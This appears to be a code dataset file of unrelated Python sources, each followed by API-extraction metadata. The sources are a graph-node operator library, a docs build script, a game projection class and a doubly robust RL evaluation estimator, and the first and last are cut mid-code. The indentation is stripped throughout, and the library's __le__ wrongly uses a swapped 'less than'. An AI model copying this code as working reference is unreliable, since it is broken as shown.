Node representing multi-dimensional operations performed on a node.
Parameters
----------
target : cal
The multi-dimensional variable used for indexing into.
idx : tuple
Tuple of either integer values or index/index_op nodes.
"""
def __init__(self, target, *args, **kwargs):
if "domain" in kwargs:
domain = tuple(kwargs.pop("domain")) if isinstance(kwargs["domain"], list) else kwargs.pop("domain")
else:
all_args = _flatten_iterable(args)
slice1_var, slice1_idx, slice2_var, slice2_idx = self.get_index_nodes(all_args[0], all_args[1])
domain = slice1_idx.combine_set_domains(slice2_idx)
if "op_name" in kwargs:
kwargs.pop("op_name")
target_name = f"{target.__module__}.{target.__name__}"
super(slice_op, self).__init__(*args, target=target_name, domain=domain, op_name=f"slice_{target.__name__}", **kwargs)
self.target = target
@property
def domain(self):
return self.kwargs["domain"]
def __getitem__(self, key):
if isinstance(key, (tuple, list, np.ndarray)) and len(key) == 0:
return self
elif self.is_shape_finalized() and len(self.nodes) > 0:
if isinstance(key, (int, Node)):
key = tuple([key])
if len(key) != len(self.shape):
raise KeyError(f"Invalid key shape for {self.name}:\n"
f"Shape: {self.shape}\n"
f"Key: {key}")
name = f"{self.name}{key}"
if name not in self.nodes.keys():
raise KeyError(f"{name} not in {self.name} keys:\n"
f"Node keys: {list(self.nodes.keys())}")
ret = self.nodes[name]
return ret
else:
name = []
if isinstance(key, Node):
name.append(key.name)
elif hasattr(key, "__len__") and not isinstance(key, str):
for k in key:
if isinstance(k, Node):
name.append(k.name)
else:
name.append(str(k))
else:
name.append(key)
name = self.var.name + "[" + "][".join(name) + "]"
if name in self.graph.nodes:
return self.graph.nodes[name]
elif isinstance(key, (list)):
return var_index(self, key, name=name, graph=self.graph)
elif isinstance(key, tuple):
return var_index(self, list(key), name=name, graph=self.graph)
else:
return var_index(self, [key], name=name, graph=self.graph)
def set_shape(self, shape=None, init=False):
s = []
assert isinstance(shape, (tuple, list))
if all([isinstance(sv, Integral) for sv in shape]) and len(self.domain) == np.product(shape) and len(shape) > 0:
self._shape = shape if isinstance(shape, tuple) else tuple(shape)
else:
for idx, d in enumerate(self.domain.dom_set):
if shape and isinstance(shape[idx], (func_op, Integral)):
s.append(shape[idx])
elif shape and isinstance(shape[idx], float):
s.append(int(shape[idx]))
elif isinstance(d, float):
s.append(int(d))
elif isinstance(d, var_index):
s.append(d.domain)
else:
s.append(d)
self._shape = tuple(s)
def is_scalar(self, val):
return not isinstance(val, np.ndarray) or (len(val.shape) == 1 and val.shape[0] == 1)
def _evaluate(self, op1, op2, context=None, **kwargs):
if self.is_scalar(op1) or self.is_scalar(op2):
value = self.target(op1, op2)
else:
arg0_dom = self.args[0].domain
arg1_dom = self.args[1].domain
op1_idx = self.domain.map_sub_domain(arg0_dom) if isinstance(self.args[0], Node) else tuple([])
op2_idx = self.domain.map_sub_domain(arg1_dom) if isinstance(self.args[1], Node) else tuple([])
op1 = np.asarray(list(map(lambda x: op1[x], op1_idx))).reshape(self.domain.computed_shape)
op2 = np.asarray(list(map(lambda x: op2[x], op2_idx))).reshape(self.domain.computed_shape)
value = self.target(op1, op2)
return value
def get_index_nodes(self, slice1_var=None, slice2_var=None):
if slice1_var is None and slice2_var is None:
slice1_var, slice2_var = self.args
if isinstance(slice1_var, (slice_op, var_index)) or _is_node_type_instance(slice1_var, "GroupNode"):
slice1_idx = slice1_var.domain
elif _is_node_type_instance(slice1_var, "index"):
slice1_idx = slice1_var.domain
else:
slice1_idx = Domain(tuple([]))
if isinstance(slice2_var, (slice_op, var_index)) or _is_node_type_instance(slice2_var, "GroupNode"):
slice2_idx = slice2_var.domain
elif _is_node_type_instance(slice2_var, "index"):
slice2_idx = slice2_var.domain
else:
slice2_idx = Domain(tuple([]))
return slice1_var, slice1_idx, slice2_var, slice2_idx
def __add__(self, other):
return slice_op(operator.add, self, other, graph=self.graph)
def __radd__(self, other):
return slice_op(operator.add, other, self, graph=self.graph)
def __sub__(self, other):
return slice_op(operator.sub, self, other, graph=self.graph)
def __rsub__(self, other):
return slice_op(operator.sub, other, self, graph=self.graph)
def __pow__(self, other):
return slice_op(builtins.pow, self, other, graph=self.graph)
def __rpow__(self, other):
return slice_op(builtins.pow, other, self, graph=self.graph)
def __mul__(self, other):
return slice_op(operator.mul, self, other, graph=self.graph)
def __rmul__(self, other):
return slice_op(operator.mul, other, self, graph=self.graph)
def __truediv__(self, other):
return slice_op(operator.truediv, self, other, graph=self.graph)
def __rtruediv__(self, other):
return slice_op(operator.truediv, other, self, graph=self.graph)
def __floordiv__(self, other):
return slice_op(operator.floordiv, self, other, graph=self.graph)
def __rfloordiv__(self, other):
return slice_op(operator.floordiv, other, self, graph=self.graph)
def __mod__(self, other):
return slice_op(operator.mod, self, other, graph=self.graph)
def __rmod__(self, other):
return slice_op(operator.mod, other, self, graph=self.graph)
def __lshift__(self, other):
return slice_op(operator.lshift, self, other, graph=self.graph)
def __rlshift__(self, other):
return slice_op(operator.lshift, other, self, graph=self.graph)
def __rshift__(self, other):
return slice_op(operator.rshift, self, other, graph=self.graph)
def __rrshift__(self, other):
return slice_op(operator.rshift, other, self, graph=self.graph)
def __and__(self, other):
return slice_op(operator.and_, self, other, graph=self.graph)
def __rand__(self, other):
return slice_op(operator.and_, other, self, graph=self.graph)
def __or__(self, other):
return slice_op(operator.or_, self, other, graph=self.graph)
def __ror__(self, other):
return slice_op(operator.or_, other, self, graph=self.graph)
def __xor__(self, other):
return slice_op(operator.xor, self, other, graph=self.graph)
def __rxor__(self, other):
return slice_op(operator.xor, other, self, graph=self.graph)
def __lt__(self, other):
return slice_op(operator.lt, self, other, graph=self.graph)
def __le__(self, other):
return slice_op(operator.lt, other, self, graph=self.graph)
def __ne__(self, other):
return slice_op(operator.ne, self, other, graph=self.graph)
def __gt__(self, other):
return slice_op(operator.gt, self, other, graph=self.graph)
def __ge__(self, other):
return slice_op(operator.ge, self, other, graph=self.graph)
def __repr__(self):
return "<slice_%s '%s'>" % (self.target.__name__, self.name)
class func_op(Node): # pylint: disable=C0103,R0903
"""
Node wrapper for stateless functions.
Parameters
----------
target : callable
function to evaluate the node
args : tuple
positional arguments passed to the target
kwargs : dict
keywoard arguments passed to the target
"""
def __init__(self, target, *args, **kwargs):
kwargs["op_name"] = kwargs["op_name"] if "op_name" in kwargs \
else f"{target.__name__}"
if "domain" in kwargs:
domain = tuple(kwargs.pop("domain")) if isinstance(kwargs["domain"], list) else kwargs.pop("domain")
elif len(args) == 2:
all_args = _flatten_iterable(args)
slice1_var, slice1_idx, slice2_var, slice2_idx = self.get_index_nodes(all_args[0], all_args[1])
domain = slice1_idx.combine_set_domains(slice2_idx)
else:
domain = Domain(tuple([]))
self._target = None
super(func_op, self).__init__(*args, target=f"{target.__module__}.{target.__name__}", domain=domain, **kwargs)
self.target = target
self.added_attrs += ["domain", "target"]
@property
def target(self):
return self._target
@target.setter
def target(self, fnc):
self._target = fnc
self.op_name = f"{fnc.__name__}"
self.kwargs["target"] = f"{fnc.__module__}.{fnc.__name__}"
def __getitem__(self, key):
return self
@property
def domain(self):
return self.kwargs["domain"]
def get_index_nodes(self, slice1_var=None, slice2_var=None):
if slice1_var is None and slice2_var is None:
slice1_var, slice2_var = self.args
if isinstance(slice1_var, (slice_op, var_index)) or _is_node_type_instance(slice1_var, "GroupNode"):
slice1_idx = slice1_var.domain
else:
slice1_idx = Domain(tuple([]))
if isinstance(slice2_var, (slice_op, var_index)) or _is_node_type_instance(slice2_var, "GroupNode"):
slice2_idx = slice2_var.domain
else:
slice2_idx = Domain(tuple([]))
return slice1_var, slice1_idx, slice2_var, slice2_idx
def _evaluate(self, *args, **kwargs):
for aa in list(kwargs.keys()):
if aa in self.added_attrs:
kwargs.pop(aa)
return self.target(*args, **kwargs)
def __call__(self, *args, **kwargs):
return call(self, *args, **kwargs)
def __repr__(self):
return "<func_op '%s' target=%s args=<%d items>>" % \
(self.name, self.kwargs["target"], len(self.args))
def nodeop(target=None, **kwargs):
"""
Decorator for creating nodes from functions.
"""
# This is called when the decorator is used with arguments
if target is None:
return functools.partial(nodeop, **kwargs)
# This is called when the decorator is used without arguments
@functools.wraps(target)
def _wrapper(*args, **kwargs_inner):
return func_op(target, *args, **kwargs_inner, **kwargs)
return _wrapper
@nodeop
def call(func, *args, **kwargs):
"""
Call `func` with positional arguments `args` and keyword arguments `kwargs`.
Parameters
----------
func : callable
Function to call when the node is executed.
args : list
Sequence of positional arguments passed to `func`.
kwargs : dict
Mapping of keyword arguments passed to `func`.
"""
return func(*args, **kwargs)
@contextlib.contextmanager
def control_dependencies(dependencies, graph=None):
"""
Ensure that all `dependencies` are executed before any nodes in this scope.
Parameters
----------
dependencies : list
Sequence of nodes to be evaluted before evaluating any nodes defined in this
scope.
"""
# Add dependencies to the graph
graph = Node.get_active_graph(graph)
graph.dependencies.extend(dependencies)
yield
# Remove dependencies from the graph
del graph.dependencies[-len(dependencies):]
#pylint: disable=C0103
abs_ = nodeop(builtins.abs)
dict_ = nodeop(builtins.dict)
help_ = nodeop(builtins.help)
min_ = nodeop(builtins.min)
setattr_ = nodeop(builtins.setattr)
all_ = nodeop(builtins.all)
dir_ = nodeop(builtins.dir)
hex_ = nodeop(builtins.hex)
next_ = nodeop(builtins.next)
slice_ = nodeop(builtins.slice)
any_ = nodeop(builtins.any)
divmod_ = nodeop(builtins.divmod)
id_ = nodeop(builtins.id)
object_ = nodeop(builtins.object)
sorted_ = nodeop(builtins.sorted)
ascii_ = nodeop(builtins.ascii)
enumerate_ = nodeop(builtins.enumerate)
input_ = nodeop(builtins.input)
oct_ = nodeop(builtins.oct)
staticmethod_ = nodeop(builtins.staticmethod)
bin_ = nodeop(builtins.bin)
eval_ = nodeop(builtins.eval)
int_ = nodeop(builtins.int)
open_ = nodeop(builtins.open)
str_ = nodeop(builtins.str)
bool_ = nodeop(builtins.bool)
exec_ = nodeop(builtins.exec)
isinstance_ = nodeop(builtins.isinstance)
ord_ = nodeop(builtins.ord)
sum_ = nodeop(builtins.sum)
bytearray_ = nodeop(builtins.bytearray)
filter_ = nodeop(builtins.filter)
issubclass_ = nodeop(builtins.issubclass)
pow_ = nodeop(builtins.pow)
super_ = nodeop(builtins.super)
bytes_ = nodeop(builtins.bytes)
float_ = nodeop(builtins.float)
iter_ = nodeop(builtins.iter)
print_ = nodeop(builtins.print)
tuple_ = nodeop(builtins.tuple)
callable_ = nodeop(builtins.callable)
format_ = nodeop(builtins.format)
len_ = nodeop(builtins.len)
property_ = nodeop(builtins.property)
type_ = nodeop(builtins.type)
chr_ = nodeop(builtins.chr)
frozenset_ = nodeop(builtins.frozenset)
list_ = nodeop(builtins.list)
range_ = nodeop(builtins.range)
vars_ = nodeop(builtins.vars)
classmethod_ = nodeop(builtins.classmethod)
getattr_ = nodeop(builtins.getattr)
locals_ = nodeop(builtins.locals)
repr_ = nodeop(builtins.repr)
zip_ = nodeop(builtins.zip)
compile_ = nodeop(builtins.compile)
globals_ = nodeop(builtins.globals)
map_ = nodeop(builtins.map)
reversed_ = nodeop(builtins.reversed)
complex_ = nodeop(builtins.complex)
hasattr_ = nodeop(builtins.hasattr)
max_ = nodeop(builtins.max)
round_ = nodeop(builtins.round)
delattr_ = nodeop(builtins.delattr)
hash_ = nodeop(builtins.hash)
memoryview_ = nodeop(builtins.memoryview)
set_ = nodeop(builtins.set)
add = nodeop(operator.add)
and_ = nodeop(operator.and_)
attrgetter = nodeop(operator.attrgetter)
concat = nodeop(operator.concat)
contains = nodeop(operator.contains)
countOf = nodeop(operator.countOf)
delitem = nodeop(operator.delitem)
eq = nodeop(operator.eq)
floordiv = nodeop(operator.floordiv)
ge = nodeop(operator.ge)
getitem = nodeop(operator.getitem)
gt = nodeop(operator.gt)
index = nodeop(operator.index)
indexOf = nodeop(operator.indexOf)
inv = nodeop(operator.inv)
invert = nodeop(operator.invert)
ior = nodeop(operator.ior)
ipow = nodeop(operator.ipow)
irshift = nodeop(operator.irshift)
is_ = nodeop(operator.is_)
is_not = nodeop(operator.is_not)
itemgetter = nodeop(operator.itemgetter)
le = nodeop(operator.le)
length_hint = nodeop(operator.length_hint)
lshift = nodeop(operator.lshift)
lt = nodeop(operator.lt)
matmul = nodeop(operator.matmul)
methodcaller = nodeop(operator.methodcaller)
mod = nodeop(operator.mod)
mul = nodeop(operator.mul)
ne = nodeop(operator.ne)
neg = nodeop(operator.neg)
not_ = nodeop(operator.not_)
or_ = nodeop(operator.or_)
pos = nodeop(operator.pos)
rshift = nodeop(operator.rshift)
setitem = nodeop(operator.setitem)
sub = nodeop(operator.sub)
truediv = nodeop(operator.truediv)
truth = nodeop(operator.truth)
xor = nodeop(operator.xor)
import_ = nodeop(importlib.import_module)
| [
"numpy.product",
"numpy.prod",
"collections.OrderedDict",
"collections.deque",
"traceback.extract_stack",
"numpy.ravel_multi_index",
"numpy.asarray",
"functools.wraps",
"uuid.uuid4",
"numpy.squeeze",
"functools.partial",
"numpy.expand_dims",
"numpy.int"
] | [((1238, 1251), 'collections.deque', 'deque', (['[None]'], {}), '([None])\n', (1243, 1251), False, 'from collections import OrderedDict, Mapping, Sequence, deque\n'), ((46542, 46565), 'functools.wraps', 'functools.wraps', (['target'], {}), '(target)\n', (46557, 46565), False, 'import functools\n'), ((1981, 1994), 'collections.OrderedDict', 'OrderedDict', ([], {}), '()\n', (1992, 1994), False, 'from collections import OrderedDict, Mapping, Sequence, deque\n'), ((2554, 2586), 'traceback.extract_stack', 'traceback.extract_stack', ([], {'limit': '(1)'}), '(limit=1)\n', (2577, 2586), False, 'import traceback\n'), ((14781, 14854), 'functools.partial', 'functools.partial', (['self.evaluate_node'], {'context': 'context', 'callback': 'callback'}), '(self.evaluate_node, context=context, callback=callback)\n', (14798, 14854), False, 'import functools\n'), ((46434, 46469), 'functools.partial', 'functools.partial', (['nodeop'], {}), '(nodeop, **kwargs)\n', (46451, 46469), False, 'import functools\n'), ((15961, 16024), 'functools.partial', 'functools.partial', (['cls.evaluate_node'], {'context': 'context'}), '(cls.evaluate_node, context=context, **kwargs)\n', (15978, 16024), False, 'import functools\n'), ((28968, 29021), 'numpy.ravel_multi_index', 'np.ravel_multi_index', (['key'], {'dims': 'self.shape', 'order': '"""C"""'}), "(key, dims=self.shape, order='C')\n", (28988, 29021), True, 'import numpy as np\n'), ((30292, 30309), 'numpy.asarray', 'np.asarray', (['[var]'], {}), '([var])\n', (30302, 30309), True, 'import numpy as np\n'), ((2379, 2391), 'uuid.uuid4', 'uuid.uuid4', ([], {}), '()\n', (2389, 2391), False, 'import uuid\n'), ((13002, 13014), 'uuid.uuid4', 'uuid.uuid4', ([], {}), '()\n', (13012, 13014), False, 'import uuid\n'), ((28852, 28871), 'numpy.prod', 'np.prod', (['self.shape'], {}), '(self.shape)\n', (28859, 28871), True, 'import numpy as np\n'), ((30618, 30636), 'numpy.prod', 'np.prod', (['var.shape'], {}), '(var.shape)\n', (30625, 30636), True, 'import numpy as np\n'), ((30640, 30658), 'numpy.prod', 'np.prod', (['out_shape'], {}), '(out_shape)\n', (30647, 30658), True, 'import numpy as np\n'), ((30896, 30911), 'numpy.squeeze', 'np.squeeze', (['var'], {}), '(var)\n', (30906, 30911), True, 'import numpy as np\n'), ((30961, 30979), 'numpy.prod', 'np.prod', (['var.shape'], {}), '(var.shape)\n', (30968, 30979), True, 'import numpy as np\n'), ((30983, 31001), 'numpy.prod', 'np.prod', (['out_shape'], {}), '(out_shape)\n', (30990, 31001), True, 'import numpy as np\n'), ((38171, 38188), 'numpy.product', 'np.product', (['shape'], {}), '(shape)\n', (38181, 38188), True, 'import numpy as np\n'), ((6037, 6050), 'numpy.int', 'np.int', (['shape'], {}), '(shape)\n', (6043, 6050), True, 'import numpy as np\n'), ((30554, 30569), 'numpy.asarray', 'np.asarray', (['var'], {}), '(var)\n', (30564, 30569), True, 'import numpy as np\n'), ((31938, 31979), 'numpy.asarray', 'np.asarray', (['[var[idx] for idx in indices]'], {}), '([var[idx] for idx in indices])\n', (31948, 31979), True, 'import numpy as np\n'), ((30828, 30855), 'numpy.expand_dims', 'np.expand_dims', (['var'], {'axis': 'i'}), '(var, axis=i)\n', (30842, 30855), True, 'import numpy as np\n')] |
"""Build the C client docs.
"""
from __future__ import with_statement
import os
import shutil
import socket
import subprocess
import time
import urllib2
def clean_dir(dir):
try:
shutil.rmtree(dir)
except:
pass
os.makedirs(dir)
def gen_api(dir):
clean_dir(dir)
clean_dir("docs/source/doxygen")
with open(os.devnull, 'w') as null:
subprocess.call(["doxygen", "doxygenConfig"], stdout=null, stderr=null)
os.rename("docs/source/doxygen/html", dir)
def gen_sphinx(dir):
clean_dir(dir)
os.chdir("docs/source/sphinx")
with open(os.devnull, 'w') as null:
subprocess.call(["make", "html"], stdout=null, stderr=null)
os.chdir("../../../")
if os.path.isdir("docs/source/sphinx/build/html"):
os.rename("docs/source/sphinx/build/html", dir)
def version():
"""Get the driver version from doxygenConfig.
"""
with open("doxygenConfig") as f:
for line in f.readlines():
if line.startswith("PROJECT_NUMBER"):
return line.split("=")[1].strip()
def main():
print("Generating Sphinx docs in docs/html")
gen_sphinx("docs/html")
print("Generating Doxygen docs in docs/html/api")
gen_api("docs/html/api")
if __name__ == "__main__":
main()
| [
"os.makedirs",
"os.rename",
"os.chdir",
"os.path.isdir",
"subprocess.call",
"shutil.rmtree"
] | [((240, 256), 'os.makedirs', 'os.makedirs', (['dir'], {}), '(dir)\n', (251, 256), False, 'import os\n'), ((458, 500), 'os.rename', 'os.rename', (['"""docs/source/doxygen/html"""', 'dir'], {}), "('docs/source/doxygen/html', dir)\n", (467, 500), False, 'import os\n'), ((546, 576), 'os.chdir', 'os.chdir', (['"""docs/source/sphinx"""'], {}), "('docs/source/sphinx')\n", (554, 576), False, 'import os\n'), ((691, 712), 'os.chdir', 'os.chdir', (['"""../../../"""'], {}), "('../../../')\n", (699, 712), False, 'import os\n'), ((720, 766), 'os.path.isdir', 'os.path.isdir', (['"""docs/source/sphinx/build/html"""'], {}), "('docs/source/sphinx/build/html')\n", (733, 766), False, 'import os\n'), ((192, 210), 'shutil.rmtree', 'shutil.rmtree', (['dir'], {}), '(dir)\n', (205, 210), False, 'import shutil\n'), ((381, 452), 'subprocess.call', 'subprocess.call', (["['doxygen', 'doxygenConfig']"], {'stdout': 'null', 'stderr': 'null'}), "(['doxygen', 'doxygenConfig'], stdout=null, stderr=null)\n", (396, 452), False, 'import subprocess\n'), ((626, 685), 'subprocess.call', 'subprocess.call', (["['make', 'html']"], {'stdout': 'null', 'stderr': 'null'}), "(['make', 'html'], stdout=null, stderr=null)\n", (641, 685), False, 'import subprocess\n'), ((776, 823), 'os.rename', 'os.rename', (['"""docs/source/sphinx/build/html"""', 'dir'], {}), "('docs/source/sphinx/build/html', dir)\n", (785, 823), False, 'import os\n')] |
import glm
import math
from lib.opengl import RenderSettings
class GameProjection:
def __init__(self, rs: "GameRenderSettings"):
self.rs = rs
self.scale = 10.
self.rotation_deg = 0.
self.location = glm.vec3(0)
self._stack = []
def projection_matrix_4(self) -> glm.mat4:
scale = 1.
ratio = self.rs.render_width / self.rs.render_height
m = glm.ortho(-scale * ratio, scale * ratio, -scale, scale, -10, 10)
return m
def transformation_matrix_4(self) -> glm.mat4:
m = glm.rotate(
glm.mat4(1), -self.rotation_deg / 180 * glm.pi(), glm.vec3(0, 0, 1)
)
m = m * glm.scale(glm.mat4(), glm.vec3(2. / self.scale))
m = m * glm.translate(glm.mat4(), glm.vec3(-self.location.x, -self.location.y, 0))
return m
def transformation_matrix(self) -> glm.mat3:
m = rotation_matrix_2d(self.rotation_deg)
m *= self.scale * .5
m[2][0] = self.location.x
m[2][1] = self.location.y
return m
def push(self):
self._stack.append({
"scale": self.scale,
"rotation": self.rotation_deg,
"location": self.location.__copy__(),
})
def pop(self):
s = self._stack.pop(-1)
self.scale = s["scale"]
self.rotation_deg = s["rotation"]
self.location = s["location"]
def __enter__(self):
self.push()
return self
def __exit__(self, exc_type, exc_val, exc_tb):
self.pop()
def rotation_matrix_2d(degree: float) -> glm.mat3:
a = degree / 180. * math.pi
sa = math.sin(a)
ca = math.cos(a)
return glm.mat3(
ca, sa, 0,
-sa, ca, 0,
0, 0, 1
)
class GameRenderSettings(RenderSettings):
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self.projection = GameProjection(self)
| [
"glm.mat4",
"glm.mat3",
"math.cos",
"glm.vec3",
"glm.pi",
"math.sin",
"glm.ortho"
] | [((1632, 1643), 'math.sin', 'math.sin', (['a'], {}), '(a)\n', (1640, 1643), False, 'import math\n'), ((1653, 1664), 'math.cos', 'math.cos', (['a'], {}), '(a)\n', (1661, 1664), False, 'import math\n'), ((1676, 1716), 'glm.mat3', 'glm.mat3', (['ca', 'sa', '(0)', '(-sa)', 'ca', '(0)', '(0)', '(0)', '(1)'], {}), '(ca, sa, 0, -sa, ca, 0, 0, 0, 1)\n', (1684, 1716), False, 'import glm\n'), ((238, 249), 'glm.vec3', 'glm.vec3', (['(0)'], {}), '(0)\n', (246, 249), False, 'import glm\n'), ((415, 479), 'glm.ortho', 'glm.ortho', (['(-scale * ratio)', '(scale * ratio)', '(-scale)', 'scale', '(-10)', '(10)'], {}), '(-scale * ratio, scale * ratio, -scale, scale, -10, 10)\n', (424, 479), False, 'import glm\n'), ((585, 596), 'glm.mat4', 'glm.mat4', (['(1)'], {}), '(1)\n', (593, 596), False, 'import glm\n'), ((635, 652), 'glm.vec3', 'glm.vec3', (['(0)', '(0)', '(1)'], {}), '(0, 0, 1)\n', (643, 652), False, 'import glm\n'), ((625, 633), 'glm.pi', 'glm.pi', ([], {}), '()\n', (631, 633), False, 'import glm\n'), ((689, 699), 'glm.mat4', 'glm.mat4', ([], {}), '()\n', (697, 699), False, 'import glm\n'), ((701, 727), 'glm.vec3', 'glm.vec3', (['(2.0 / self.scale)'], {}), '(2.0 / self.scale)\n', (709, 727), False, 'import glm\n'), ((758, 768), 'glm.mat4', 'glm.mat4', ([], {}), '()\n', (766, 768), False, 'import glm\n'), ((770, 817), 'glm.vec3', 'glm.vec3', (['(-self.location.x)', '(-self.location.y)', '(0)'], {}), '(-self.location.x, -self.location.y, 0)\n', (778, 817), False, 'import glm\n')] |
#!/usr/bin/env python3
# Copyright (c) Facebook, Inc. and its affiliates. All rights reserved.
import itertools
import logging
import numpy as np
import scipy as sp
import torch
from ml.rl.evaluation.cpe import CpeEstimate
from ml.rl.evaluation.evaluation_data_page import EvaluationDataPage
logger = logging.getLogger(__name__)
logger.setLevel(logging.INFO)
class WeightedSequentialDoublyRobustEstimator:
NUM_SUBSETS_FOR_CB_ESTIMATES = 25
CONFIDENCE_INTERVAL = 0.9
NUM_BOOTSTRAP_SAMPLES = 50
BOOTSTRAP_SAMPLE_PCT = 0.5
def __init__(self, gamma):
self.gamma = gamma
def estimate(
self,
edp: EvaluationDataPage,
num_j_steps,
whether_self_normalize_importance_weights,
) -> CpeEstimate:
# For details, visit https://arxiv.org/pdf/1604.00923.pdf Section 5, 7, 8
(
actions,
rewards,
logged_propensities,
target_propensities,
estimated_q_values,
) = WeightedSequentialDoublyRobustEstimator.transform_to_equal_length_trajectories(
edp.mdp_id,
edp.action_mask.cpu().numpy(),
edp.logged_rewards.cpu().numpy().flatten(),
edp.logged_propensities.cpu().numpy().flatten(),
edp.model_propensities.cpu().numpy(),
edp.model_values.cpu().numpy(),
)
num_trajectories = actions.shape[0]
trajectory_length = actions.shape[1]
j_steps = [float("inf")]
if num_j_steps > 1:
j_steps.append(-1)
if num_j_steps > 2:
interval = trajectory_length // (num_j_steps - 1)
j_steps.extend([i * interval for i in range(1, num_j_steps - 1)])
target_propensity_for_logged_action = np.sum(
np.multiply(target_propensities, actions), axis=2
)
estimated_q_values_for_logged_action = np.sum(
np.multiply(estimated_q_values, actions), axis=2
)
estimated_state_values = np.sum(
np.multiply(target_propensities, estimated_q_values), axis=2
)
importance_weights = target_propensity_for_logged_action / logged_propensities
importance_weights = np.cumprod(importance_weights, axis=1)
importance_weights = WeightedSequentialDoublyRobustEstimator.normalize_importance_weights(
importance_weights, whether_self_normalize_importance_weights
)
importance_weights_one_earlier = (
np.ones([num_trajectories, 1]) * 1.0 / num_trajectories
)
importance_weights_one_earlier = np.hstack(
[importance_weights_one_earlier, importance_weights[:, :-1]]
)
discounts = np.logspace(
start=0, stop=trajectory_length - 1, num=trajectory_length, base=self.gamma
)
j_step_return_trajectories = []
for j_step in j_steps:
j_step_return_trajectories.append(
WeightedSequentialDoublyRobustEstimator.calculate_step_return(
rewards,
discounts,
importance_weights,
importance_weights_one_earlier,
estimated_state_values,
estimated_q_values_for_logged_action,
j_step,
)
)
j_step_return_trajectories = np.array(j_step_return_trajectories)
j_step_returns = np.sum(j_step_return_trajectories, axis=1)
if len(j_step_returns) == 1:
weighted_doubly_robust = j_step_returns[0]
weighted_doubly_robust_std_error = 0.0
else:
# break trajectories into several subsets to estimate confidence bounds
infinite_step_returns = []
num_subsets = int(
min(
num_trajectories / 2,
WeightedSequentialDoublyRobustEstimator.NUM_SUBSETS_FOR_CB_ESTIMATES,
)
)
interval = num_trajectories / num_subsets
for i in range(num_subsets):
trajectory_subset = np.arange(
int(i * interval), int((i + 1) * interval)
)
importance_weights = (
target_propensity_for_logged_action[trajectory_subset]
/ logged_propensities[trajectory_subset]
)
importance_weights = np.cumprod(importance_weights, axis=1)
importance_weights = WeightedSequentialDoublyRobustEstimator.normalize_importance_weights(
importance_weights, whether_self_normalize_importance_weights
)
importance_weights_one_earlier = (
np.ones([len(trajectory_subset), 1]) * 1.0 / len(trajectory_subset)
)
importance_weights_one_earlier = np.hstack(
[importance_weights_one_earlier, importance_weights[:, :-1]]
)
infinite_step_return = np.sum(
WeightedSequentialDoublyRobustEstimator.calculate_step_return(
rewards[trajectory_subset],
discounts,
importance_weights,
importance_weights_one_earlier,
estimated_state_values[trajectory_subset],
estimated_q_values_for_logged_action[trajectory_subset],
float("inf"),
)
)
infinite_step_returns.append(infinite_step_return)
# Compute weighted_doubly_robust mean point estimate using all data
weighted_doubly_robust = self.compute_weighted_doubly_robust_point_estimate(
j_steps,
num_j_steps,
j_step_returns,
infinite_step_returns,
j_step_return_trajectories,
)
# Use bootstrapping to compute weighted_doubly_robust standard error
bootstrapped_means = []
sample_size = int(
WeightedSequentialDoublyRobustEstimator.BOOTSTRAP_SAMPLE_PCT
* num_subsets
)
for _ in range(
WeightedSequentialDoublyRobustEstimator.NUM_BOOTSTRAP_SAMPLES
):
random_idxs = np.random.choice(num_j_steps, sample_size, replace=False)
random_idxs.sort()
wdr_estimate = self.compute_weighted_doubly_robust_point_estimate(
j_steps=[j_steps[i] for i in random_idxs],
num_j_steps=sample_size,
j_step_returns=j_step_returns[random_idxs],
infinite_step_returns=infinite_step_returns,
j_step_return_trajectories=j_step_return_trajectories[random_idxs],
)
bootstrapped_means.append(wdr_estimate)
weighted_doubly_robust_std_error = np.std(bootstrapped_means)
episode_values = np.sum(np.multiply(rewards, discounts), axis=1)
denominator = np.nanmean(episode_values)
if abs(denominator) < 1e-6:
return CpeEstimate(
raw=0.0, normalized=0.0, raw_std_error=0.0, normalized_std_error=0.0
)
return CpeEstimate(
raw=weighted_doubly_robust,
normalized=weighted_doubly_robust / denominator,
raw_std_error=weighted_doubly_robust_std_error,
normalized_std_error=weighted_doubly_robust_std_error / denominator,
)
def compute_weighted_doubly_robust_point_estimate(
self,
j_steps,
num_j_steps,
j_step_returns,
infinite_step_returns,
j_step_return_trajectories,
):
low_bound, high_bound = WeightedSequentialDoublyRobustEstimator.confidence_bounds(
infinite_step_returns,
WeightedSequentialDoublyRobustEstimator.CONFIDENCE_INTERVAL,
)
# decompose error into bias + variance
j_step_bias = np.zeros([num_j_steps])
where_lower = np.where(j_step_returns < low_bound)[0]
j_step_bias[where_lower] = low_bound - j_step_returns[where_lower]
where_higher = np.where(j_step_returns > high_bound)[0]
j_step_bias[where_higher] = j_step_returns[where_higher] - high_bound
covariance = np.cov(j_step_return_trajectories)
error = covariance + j_step_bias.T * j_step_bias
# minimize mse error
constraint = {"type": "eq", "fun": lambda x: np.sum(x) - 1.0}
x = np.zeros([len(j_steps)])
res = sp.optimize.minimize(
mse_loss,
x,
args=error,
constraints=constraint,
bounds=[(0, 1) for _ in range(x.shape[0])],
)
x = np.array(res.x)
return float(np.dot(x, j_step_returns))
@staticmethod
def transform_to_equal_length_trajectories(
mdp_ids,
actions,
rewards,
logged_propensities,
target_propensities,
estimated_q_values,
):
"""
Take in samples (action, rewards, propensities, etc.) and output lists
of equal-length trajectories (episodes) accoriding to terminals.
As the raw trajectories are of various lengths, the shorter ones are
filled with zeros(ones) at the end.
"""
num_actions = len(target_propensities[0])
terminals = np.zeros(mdp_ids.shape[0])
for x in range(0, mdp_ids.shape[0]):
if x + 1 == mdp_ids.shape[0] or mdp_ids[x, 0] != mdp_ids[x + 1, 0]:
terminals[x] = 1
trajectories = []
episode_start = 0
episode_ends = np.nonzero(terminals)[0]
if len(terminals) - 1 not in episode_ends:
episode_ends = np.append(episode_ends, len(terminals) - 1)
for episode_end in episode_ends:
trajectories.append(np.arange(episode_start, episode_end + 1))
episode_start = episode_end + 1
action_trajectories = []
reward_trajectories = []
logged_propensity_trajectories = []
target_propensity_trajectories = []
Q_value_trajectories = []
for trajectory in trajectories:
action_trajectories.append(actions[trajectory])
reward_trajectories.append(rewards[trajectory])
logged_propensity_trajectories.append(logged_propensities[trajectory])
target_propensity_trajectories.append(target_propensities[trajectory])
Q_value_trajectories.append(estimated_q_values[trajectory])
def to_equal_length(x, fill_value):
x_equal_length = np.array(
list(itertools.zip_longest(*x, fillvalue=fill_value))
).swapaxes(0, 1)
return x_equal_length
action_trajectories = to_equal_length(
action_trajectories, np.zeros([num_actions])
)
